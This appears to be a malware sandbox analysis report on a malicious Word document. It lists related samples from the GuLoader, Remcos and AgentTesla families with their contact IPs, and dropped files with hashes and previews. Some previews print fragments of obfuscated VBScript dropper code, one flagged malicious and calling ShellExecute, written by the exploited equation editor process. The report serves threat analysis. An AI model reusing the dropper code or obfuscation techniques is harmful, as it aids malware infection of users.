                                                        • 34.149.100.209
                                                        file.exeGet hashmaliciousBabadedaBrowse
                                                        • 34.149.100.209
                                                        zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                                                        • 34.149.100.209
                                                        JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                                                        • 34.160.144.191
                                                        THORDC-ASISwaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.228
                                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        doc_pl_invoice_awb_988-02403026_062024_00000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        36f7277af969a6947a61ae0b815907a1PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        042240724.xlsGet hashmaliciousRemcosBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        M6hS9qGbFx.rtfGet hashmaliciousAgentTeslaBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        DRWG-347RB1.pd.xlsGet hashmaliciousUnknownBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 34.166.62.190
                                                        • 93.113.54.56
                                                        No context
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                        Category:dropped
                                                        Size (bytes):71954
                                                        Entropy (8bit):7.996617769952133
                                                        Encrypted:true
                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                        Malicious:false
                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):328
                                                        Entropy (8bit):3.2418003062782916
                                                        Encrypted:false
                                                        SSDEEP:6:kKpk3D9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:BMaDImsLNkPlE99SNxAhUe/3
                                                        MD5:5BFB0DC3726E9C73923C33ED46382EBA
                                                        SHA1:D73E8FB8829CCE0C94AF5A9A86EA2B59CA311E00
                                                        SHA-256:16614362D55FF97F701FB8794144DE8232363CAD7BA00C6CAB9A230A496B4CCB
                                                        SHA-512:0300D4B50E5A6F399A01ADE4F7760CE59FBE43F57011F3AE6C4666D69D5019DAB52C6761B7F479989A12041C0B8C8A21F0B1F7E2BE457F0E8A81E21395E68A55
                                                        Malicious:false
                                                        Preview:p...... ..........9H]...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6934
                                                        Entropy (8bit):4.782948992571194
                                                        Encrypted:false
                                                        SSDEEP:192:BxoeRuVsm5emlMiMDOmEN3H+OHgFQVFn3eGOVpN6K3bkkjo5B3YrKkD:GwiQ0HzAFQVoGIpN6KQkj2g
                                                        MD5:CC3ADDB80C635733281BAC3F4123B73C
                                                        SHA1:9611CD47639CC0633FC59D27179D878D678D0999
                                                        SHA-256:368BFC4F4E9AE3B4896E033BFD85F6209D45E9016BF36B9294F12F0A12AAF6C4
                                                        SHA-512:28AA862AE188472696E678A4529C1A21AA61F0E748BED1B2DCA43D6F69D7E6315B878443D5A4A07CE956AF96CA19C50875A0D14DB719650E787A168FFDDE6C97
                                                        Malicious:false
                                                        Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Set-PSRepository........Update-ScriptFileInfo........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):415824
                                                        Entropy (8bit):3.5864483548852926
                                                        Encrypted:false
                                                        SSDEEP:3072:bHGMwf1YFjhNe4VTdRnTT8w4TW72qjnEgFypBzxjJS7GzYhOJ8XuBYO0zCV2:Xwf1YFB2qjt
                                                        MD5:4D03B030F4DB434DA80E0EC3FA7E4398
                                                        SHA1:0B4EED00595BE5235F5A51CEBEDA6FA31402B94B
                                                        SHA-256:90AFE2E4506B34BD63E597279707D13C6D8512FD52E0B670C9E45890211C76B6
                                                        SHA-512:7EC4DF4E21931E9091E77D9A23C7D81DE11B89C3D0968CD6E8ABA8F425CDA85B357E4410B3A5A0BB28E80C2AD4999D8C3CC1FBA06A2346720F3ABAD435CE9EBB
                                                        Malicious:false
                                                        Preview:..d.i.m. .g.a.m.e.l.a.n. .....g.a.m.e.l.a.n. .=. .o.p.s.o.p.h.a.g.i.a.....c.a.b.i.r.t.o.(.".b.i.s.t.o.r.t.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".l.a.c.h.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.a.n.t.o.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".v.u.l.g.o.c.r.a.c.i.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.o.i.s.i.c.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".p.o.r.t.e.l.l.o.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.9._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.1.0._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".L._.H.e.l.p.U.r.i.s._.0.1.1._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):962
                                                        Entropy (8bit):5.013130376969173
                                                        Encrypted:false
                                                        SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                        MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                        SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                        SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                        SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                        Malicious:false
                                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                        Category:dropped
                                                        Size (bytes):71954
                                                        Entropy (8bit):7.996617769952133
                                                        Encrypted:true
                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                        Malicious:false
                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:ASCII text, with very long lines (2168), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26892
                                                        Entropy (8bit):5.629815532396056
                                                        Encrypted:false
                                                        SSDEEP:768:HzSR022X/523S0e8xPPmp2TkLqur5pjMpc4i:TSuce8xPP2qur5+bi
                                                        MD5:7A6E4C385A470B962384797F26BC0B8A
                                                        SHA1:5D4EEEEF8961F0CA7A83B5BAEB36BB6715D61A11
                                                        SHA-256:B13926E222564A63A3308DE6CB116C226E93CD1E9D1B5F2FCAC2DE6D80E70206
                                                        SHA-512:BA326CBBA71BBFD6054A1F3564FCF4C085ADD37C186170E039E9CF469CDD16B0FD394F028D4D09EA45FAADEEA4CF5F4EDB64F8C5DB58EB67ED93987740D8E453
                                                        Malicious:true
                                                        Preview:Function Hazardless....Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)....End Function ....Spetrevlemundstetiser = String(236,"M") ....Rvertogterne = 61512..Supranaturalistic = &H617B..decreers = -54055..dermophobe = "Arkadens wienervalsenes smirkier fitzwater!"..Milieuvrns = &HFFFFB202..Fribilletternes = &HA946..Misrepresentation = 37891..Centralasiens = 4497..Unhasped = &HF896..Dommerstanden = "Trbeskyttelsen udgangene0, gtevir, afvbnede"..Hastemde = 34426..Fuppen = "Ters247 catholical152? turbomotorerne"..Actiniomorpha = "Kontrabogen netvrksadressernes; topvinklen215 stetikkers"..Slumstormer = &HFFFF6B6A..Solennitetssalen150 = 17979..Torskelevers = &H615D..Topstillingen = "Firspring tabulerer"..redigere = "Undiscerningness sprezzatura overdesirous strikkepindes"..Besttes = &H79DF..macroscopical = &H4D24..Hjlpetekstens = &H7376..Controversialism = "Sambars capitulum unfallen gnomists"..Humbug = 19967..Mongrels = -48175..unhelped = "Fortjningen widdies
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):186277
                                                        Entropy (8bit):6.35155733287026
                                                        Encrypted:false
                                                        SSDEEP:1536:aAZw/J+lCUsTRvsqgCyqWlUDNWdm1wpSru2A0XwjY/z02DTr3rmt6mZ:as2J+qTR0XCy/dmASru2AijbdG
                                                        MD5:4EA6026CF93EC6338144661BF1202CD1
                                                        SHA1:A1DEC9044F750AD887935A01430BF49322FBDCB7
                                                        SHA-256:8EFBC21559EF8B1BCF526800D8070BAAD42474CE7198E26FA771DBB41A76B1D8
                                                        SHA-512:6C7E0980E39AACF4C3689802353F464A08CD17753BD210EE997E5F2A455DEB4F287A9EF74D84579DBDE49BC96213CD2B8B247723919C412EA980AA6E6BFE218B
                                                        Malicious:false
                                                        Preview:0.....*.H..........0......1.0...`.H.e......0......+.....7.......0....0...+.....7...............240514162318Z0...+......0...20..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x11810319, page size 32768, DirtyShutdown, Windows version 6.1
                                                        Category:dropped
                                                        Size (bytes):21037056
                                                        Entropy (8bit):1.1390586349239729
                                                        Encrypted:false
                                                        SSDEEP:24576:PO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:POEXs1LuHqqEXwPW+RHA6m1fN
                                                        MD5:3E3CB58D1E6B2225C83B081AE7C73851
                                                        SHA1:CFEDC0B669A2CA47C67F8829B8BAEE55585D21B1
                                                        SHA-256:3F31FE3334459567031F61C4B403ECB3D2DDEA77C14B60C7467462EA93D48BC3
                                                        SHA-512:327A601079CAA4D594E2480D1DB08C19EA7CBAF36F5E0F846234B56628E10EFBA943214CFE5A201DDE61AA85AE27E5A28C4170DB5073BF9C6F1013700E555F03
                                                        Malicious:false
                                                        Preview:....... ........................u..............................;:...{..+....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):2
                                                        Entropy (8bit):1.0
                                                        Encrypted:false
                                                        SSDEEP:3:Qn:Qn
                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                        Malicious:false
                                                        Preview:..
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Fri Jul 26 12:10:42 2024, length=83905, window=hide
                                                        Category:dropped
                                                        Size (bytes):1004
                                                        Entropy (8bit):4.532533848585451
                                                        Encrypted:false
                                                        SSDEEP:12:8EPRgXg/XAlCPCHaXcB8gB/5YXX+WGQL3ItpicvbUJ5DtZ3YilMMEpxRljKg1yTE:8EP/XTMmg4X1+Ie05Dv3qXqk7N
                                                        MD5:88053DCA9DB1508FAFB7C28474A67953
                                                        SHA1:69ECE6D6498978A5A2B3A816D6B6B6F4F4E4286C
                                                        SHA-256:E1E744F444CDF19BE3F1F0DBD0B3123E829BA3C2AAF18B3215E471D15BE5D034
                                                        SHA-512:B8B8264A718DE32DE19C87480C2DADEDA231BBEDB836C97656E0BB473C0B26DEA15F4EDA504358513F3366B6BD84007D50E7E693894F06E093E89628E5B55C2E
                                                        Malicious:false
                                                        Preview:L..................F.... ...._..r...._..r...7?.7]....G...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......XSi..user.8......QK.X.XSi*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2..G...XVi .girlfrnd.doc..F.......WE..WE.*.........................g.i.r.l.f.r.n.d...d.o.c.......v...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\girlfrnd.doc.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.g.i.r.l.f.r.n.d...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8...8.....[
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:Generic INItialization configuration [folders]
                                                        Category:dropped
                                                        Size (bytes):50
                                                        Entropy (8bit):4.261467880199449
                                                        Encrypted:false
                                                        SSDEEP:3:M1P1Bp5om4HXFBp5ov:Mzhyhy
                                                        MD5:49E46E3351A547F45F165624EC46E828
                                                        SHA1:96E9DB3F221C565042576C8DED7F775A71D8E5FD
                                                        SHA-256:B7C4C8808934CEF8B66A86ECB1704FACBBA5683896661E334EA458E7E16EA3A2
                                                        SHA-512:D5C002F26CE93E61DEB87CC8562C05D3A8E2677817CDB0E42BF851772DDE61CB358455E6F6993BD203466E043685704BB726AD2ABD046C0E11F2D40ADDAB7543
                                                        Malicious:false
                                                        Preview:[doc]..girlfrnd.LNK=0..[folders]..girlfrnd.LNK=0..
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
